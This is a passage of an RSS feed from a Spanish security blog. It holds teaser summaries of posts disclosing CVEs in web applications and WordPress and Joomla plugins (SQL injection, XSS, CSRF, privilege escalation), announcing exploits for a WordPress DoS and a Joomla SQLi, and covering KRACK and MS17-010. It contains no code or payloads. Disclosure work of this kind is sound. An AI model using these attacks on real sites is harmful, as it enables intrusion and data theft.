&lt;h2 id="cve-2018-18921"&gt;CVE-2018-18921&lt;/h2&gt;
&lt;h3 id="php-server-monitor-331---cross-site-request-forgery-csrf"&gt;PHP Server Monitor 3.3.1 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery_001.webp" alt="CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;PHP Server Monitor es una &lt;strong&gt;aplicación web orientada a monitorizar la disponibilidad de servidores PHP&lt;/strong&gt;, comprueba si están correctamente funcionando, monitoriza los servicios, genera gráficos e historial de actividad además de almacenar logs de errores y permitir notificaciones a través de email y Telegram, está desarrollada en PHP y MySQL.&lt;/p&gt;</description></item><item><title>CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)</title><link>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</guid><description>&lt;p&gt;Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante &lt;strong&gt;crearse una cuenta de administrador&lt;/strong&gt; en el sistema mediante una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18922" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18922&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18922"&gt;Ticketly - CVE-2018-18922&lt;/h2&gt;
&lt;h3 id="ticketly-10---privilege-escalation-add-admin-account"&gt;Ticketly 1.0 - Privilege Escalation (Add Admin Account)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp" alt="CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections</title><link>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</guid><description>&lt;p&gt;En la &lt;a href="https://hackpuntes.com/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/"&gt;entrada anterior&lt;/a&gt;
, hemos visto una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
 en &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
, en esta entrada, vamos a ver otras vulnerabilidades que he encontrado en este software, en concreto, múltiples SQL Injections, estas vulnerabilidades han sido asociadas al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18923" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18923&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18923"&gt;Ticketly - CVE-2018-18923&lt;/h2&gt;
&lt;h3 id="ticketly-10---multiple-sql-injections"&gt;Ticketly 1.0 - Multiple SQL Injections&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp" alt="CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.&lt;/p&gt;</description></item><item><title>CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</link><pubDate>Fri, 19 Oct 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://github.com/librenms/librenms/releases/tag/1.43" target="_blank" rel="noopener noreferrer"&gt;Libre NMS 1.43&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18478" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18478&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="libre-nms--cve-2018-18478"&gt;Libre NMS - CVE-2018-18478&lt;/h2&gt;
&lt;h3 id="libre-nms-143--cross-site-scripting-persistente"&gt;Libre NMS 1.43 – Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp" alt="CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Libre Network Monitoring System, es un software utilizado para monitoreo de red basado en PHP / MySQL / SNMP que incluye el soporte para una amplia gama de hardware de red y sistemas operativos que incluyen Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP y muchos más.&lt;/p&gt;</description></item><item><title>CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</link><pubDate>Mon, 03 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como finalidad hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15918" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-159178&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15918"&gt;Jorani CVE-2018-15918&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065--sql-injection"&gt;Jorani Leave Management System 0.6.5 – SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp" alt="CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</link><pubDate>Sat, 01 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15917" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15917&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15917"&gt;Jorani CVE-2018-15917&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065---cross-site-scripting-persistente"&gt;Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp" alt="CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</link><pubDate>Sun, 26 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Blind_SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;Blind SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="http://www.sentrifugo.com/download" target="_blank" rel="noopener noreferrer"&gt;Sentrifugo HRMS 3.2&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15873" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15873&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="sentrifugo-hrms-32---cve-2018-15873"&gt;Sentrifugo HRMS 3.2 - CVE-2018-15873&lt;/h2&gt;
&lt;h3 id="blind-sql-injection"&gt;Blind SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp" alt="CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Sentrifugo es un software open source que facilita la &lt;strong&gt;administración de recursos humanos&lt;/strong&gt; en las organizaciones. Está &lt;strong&gt;repleto de módulos&lt;/strong&gt; esenciales como evaluación, gestión del tiempo, gestión de licencias, gestión de empleados, análisis, contratación, verificación de antecedentes, servicio técnico y mucho más. Permite a los empleados &lt;strong&gt;contribuir de manera efectiva y productiva&lt;/strong&gt; a los objetivos de la organización.&lt;/p&gt;</description></item><item><title>CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</link><pubDate>Fri, 24 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</guid><description>&lt;p&gt;Buenas a todos de nuevo, volviendo de las vacaciones 🏖️, &lt;a href="https://cve.mitre.org/" target="_blank" rel="noopener noreferrer"&gt;MITRE&lt;/a&gt;
 me ha asignado otro CVE para plugins &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, esta vez, he descubierto una vulnerabilidad de ejecución remota de código a través de &lt;a href="https://www.owasp.org/index.php/CSV_Injection" target="_blank" rel="noopener noreferrer"&gt;inyección CSV&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/export-users-to-csv/" target="_blank" rel="noopener noreferrer"&gt;Export Users to CSV - 1.1.1&lt;/a&gt;
, desarrollado por &lt;a href="https://www.mattcromwell.com/products/export-users-to-csv" target="_blank" rel="noopener noreferrer"&gt;Matt Cromwell&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada, no ha sido reconocida por el autor y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15571" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15571&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-15571"&gt;WordPress Plugin CVE-2018-15571&lt;/h2&gt;
&lt;h3 id="export-users-to-csv---111---inyección-csv"&gt;Export Users to CSV - 1.1.1 - Inyección CSV&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp" alt="CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-14430 WordPress Plugin Multi Step Form &lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados</title><link>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</link><pubDate>Sat, 21 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</guid><description>&lt;p&gt;Durante otra de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Reflejado (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://es.wordpress.org/plugins/multi-step-form/" target="_blank" rel="noopener noreferrer"&gt;Multi Step Form &amp;lt;= 1.2.5&lt;/a&gt;
, desarrollado por &lt;a href="https://mondula.com/" target="_blank" rel="noopener noreferrer"&gt;Mondula GmbH&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14430" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-14430&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-14430"&gt;WordPress Plugin CVE-2018-14430&lt;/h2&gt;
&lt;h3 id="multi-step-form--125--múltiples-cross-site-scripting-reflejados"&gt;Multi Step Form &amp;lt;= 1.2.5 – Múltiples Cross Site Scripting Reflejados&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp" alt="CVE-2018-14430 WordPress Plugin Multi Step Form &amp;lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-13832 WordPress Plugin All In One Favicon &lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes</title><link>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</link><pubDate>Tue, 10 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</guid><description>&lt;p&gt;Durante una de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Persintente (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/all-in-one-favicon/" target="_blank" rel="noopener noreferrer"&gt;All In One Favicon &amp;lt;= 4.6&lt;/a&gt;
, desarrollado por &lt;a href="http://www.techotronic.de/" target="_blank" rel="noopener noreferrer"&gt;Arne Franken de Techotronic&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13832" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-13832&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-13832"&gt;WordPress Plugin CVE-2018-13832&lt;/h2&gt;
&lt;h3 id="all-in-one-favicon--46--autenticado-múltiples-cross-site-scripting-persistentes"&gt;All In One Favicon &amp;lt;= 4.6 – Autenticado Múltiples Cross Site Scripting Persistentes&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp" alt="CVE-2018-13832 WordPress Plugin All In One Favicon &amp;lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6389 - WordPress Core - Denial of Service</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</link><pubDate>Thu, 08 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</guid><description>&lt;p&gt;Últimamente estoy muy atento de las vulnerabilidades de los CMS y vengo a compartir con vosotros otro exploit que he desarrollado para la vulnerabilidad &lt;a href="https://www.certsi.es/alerta-temprana/vulnerabilidades/cve-2018-6389" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6389&lt;/a&gt;
. Esta vulnerabilidad descubierta por &lt;a href="http://baraktawily.blogspot.com.es/" target="_blank" rel="noopener noreferrer"&gt;Barak Tawily&lt;/a&gt;
, permite lanzar un &lt;a href="https://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio" target="_blank" rel="noopener noreferrer"&gt;ataque de denegación de servicio (DOS)&lt;/a&gt;
 sobre las páginas webs desarrolladas con WordPress (se estima que &lt;strong&gt;aproximadamente el 29% de todas las webs que existen actualmente&lt;/strong&gt; en el mundo están desarrolladas con este framework).&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6396 - Joomla Google Map Landkarten SQL Injection</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</link><pubDate>Sun, 04 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</guid><description>&lt;p&gt;Hoy quería compartir con vosotros un &lt;a href="https://es.wikipedia.org/wiki/Exploit" target="_blank" rel="noopener noreferrer"&gt;exploit&lt;/a&gt;
 que he desarrollado en Python para explotar una vulnerabilidad SQLi descubierta por &lt;a href="https://twitter.com/ihsansencan" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 en el componente &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
, esta vulnerabilidad tiene asociado el &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396.&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="joomla-cve-2018-6396"&gt;Joomla CVE-2018-6396&lt;/h2&gt;
&lt;h3 id="joomla-component-google-map-landkarten--423--sql-injection"&gt;Joomla! Component Google Map Landkarten &amp;lt;= 4.2.3 – SQL Injection&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por &lt;a href="https://www.exploit-db.com/exploits/44113/" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 el &lt;strong&gt;16/02/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;💣 Exploit desarrollado por &lt;a href="https://twitter.com/JJavierOlmedo" target="_blank" rel="noopener noreferrer"&gt;Javier Olmedo&lt;/a&gt;
 el &lt;strong&gt;03/03/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software  &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable &amp;lt;= &lt;strong&gt;4.2.3&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cómo-usar-este-exploit"&gt;¿Cómo usar este exploit?&lt;/h3&gt;
&lt;p&gt;En primer lugar, &lt;strong&gt;usa este exploit únicamente sobre sitios web administrados por ti o en los cuales tengas consentimiento&lt;/strong&gt; para realizar está comprobación, en mi caso, me he creado una web con &lt;a href="https://downloads.joomla.org/es/" target="_blank" rel="noopener noreferrer"&gt;Joomla 3.8.5&lt;/a&gt;
 en mi máquina local.&lt;/p&gt;</description></item><item><title>KRACK (Key Reinstallation Attacks): El ataque que vulnera el protocolo WPA2 de las redes WiFi</title><link>https://hackpuntes.com/es/posts/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/</link><pubDate>Wed, 18 Oct 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi/krack-el-ataque-que-vulnera-el-protocolo-wpa2-de-las-redes-wifi_banner.webp" alt="KRACK (Key Reinstallation Attacks): El ataque que vulnera el protocolo WPA2 de las redes WiFi" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ayer se hacía pública una de las noticias que más relevancia ha tenido en los últimos meses en el mundo de la ciberseguridad, el &lt;strong&gt;protocolo de seguridad WPA2&lt;/strong&gt;, usado en la mayoría de redes WiFi de todo el mundo &lt;strong&gt;ha sido roto (vulnerado)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El investigador Mathy Vanhoef (&lt;a href="https://x.com/vanhoefm" target="_blank" rel="noopener noreferrer"&gt;@vanhoefm&lt;/a&gt;
) de la Universidad KU de Leuven ha descubierto esta vulnerabilidad y lo ha puesto en conocimiento de la comunidad para que los fabricantes saquen parches para solucionarlo, algunas empresas como Microsoft se han dado prisa y &lt;a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2017-13080" target="_blank" rel="noopener noreferrer"&gt;ya han puesto una solución a sus productos&lt;/a&gt;
.&lt;/p&gt;</description></item><item><title>Script PowerShell para comprobar vulnerabilidad MS17-010</title><link>https://hackpuntes.com/es/posts/script-powershell-para-comprobar-vulnerabilidad-ms17-010/</link><pubDate>Tue, 16 May 2017 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/script-powershell-para-comprobar-vulnerabilidad-ms17-010/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/script-powershell-para-comprobar-vulnerabilidad-ms17-010/script-powershell-para-comprobar-vulnerabilidad-ms17-010_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/script-powershell-para-comprobar-vulnerabilidad-ms17-010/script-powershell-para-comprobar-vulnerabilidad-ms17-010_banner.webp" alt="Script PowerShell para comprobar vulnerabilidad MS17-010" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Buenas a todos, después de estar mucho tiempo sin escribir en el blog, me gustaría compartir con vosotros un &lt;strong&gt;script&lt;/strong&gt; que he creado en PowerShell para &lt;strong&gt;comprobar la vulnerabilidad MS17-010&lt;/strong&gt; explotada por el ransomware WannaCry.&lt;/p&gt;
&lt;p&gt;Este script &lt;strong&gt;debe de ser ejecutado desde el controlador de dominio&lt;/strong&gt; para comprobar que equipos aún no cuentan con las actualizaciones publicadas por Microsoft para solucionar esta vulnerabilidad.&lt;/p&gt;</description></item><item><title>Explotación de vulnerabilidad CVE-2011-0762 con Metasploit en VSFTPD v2.3.4</title><link>https://hackpuntes.com/es/posts/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/</link><pubDate>Thu, 20 Oct 2016 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4/explotacion-de-vulnerabilidad-cve-2011-0762-con-metasploit-en-vsftpd-v2-3-4_banner.webp" alt="Explotación de vulnerabilidad CVE-2011-0762 con Metasploit en VSFTPD v2.3.4" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
